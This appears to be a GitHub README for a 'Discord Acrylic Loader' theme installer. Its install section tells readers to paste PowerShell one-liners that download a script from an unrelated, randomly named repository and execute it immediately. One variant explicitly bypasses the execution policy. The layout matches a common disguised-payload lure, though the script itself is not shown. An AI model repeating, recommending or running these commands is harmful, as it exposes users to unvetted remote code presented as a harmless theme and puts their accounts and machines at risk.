Skip to content

VictorShinobiTower43/Discord-Acrylic-Loader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Discord Acrylic Loader

One-liner to install transparent acrylic themes for Discord — supports Vencord, BetterDiscord, and Vesktop.

Install

Open PowerShell and run:

irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex

That's it. The installer handles everything.

What it does

  1. Detects which Discord client is installed (Stable, PTB, Canary, Vesktop).
  2. Downloads the Acrylic Harmony CSS bundle and Mica for Everyone integration.
  3. Injects the theme into Vencord/BetterDiscord's theme directory automatically.
  4. Enables transparency flags in the Discord desktop config.

Requirements

  • Windows 10 / 11 (for acrylic/mica effects)
  • Discord Desktop (any variant)
  • Vencord or BetterDiscord installed
  • PowerShell 5.1+

Troubleshooting

Theme loads but no transparency

Enable Window Transparency in Vencord settings, or install Mica for Everyone.

BetterDiscord: theme not showing in list

The CSS was placed in the wrong folder. Re-run with --bd flag.

Discord crashes after applying

You have a conflicting theme — place Acrylic Harmony last in the load order.


Alternative (bypass execution policy):

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex"

"irm is not recognized" — old PowerShell. Use:

Invoke-RestMethod https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | Invoke-Expression

License

MIT — see LICENSE.

Releases

No releases published

Packages

 
 
 

Contributors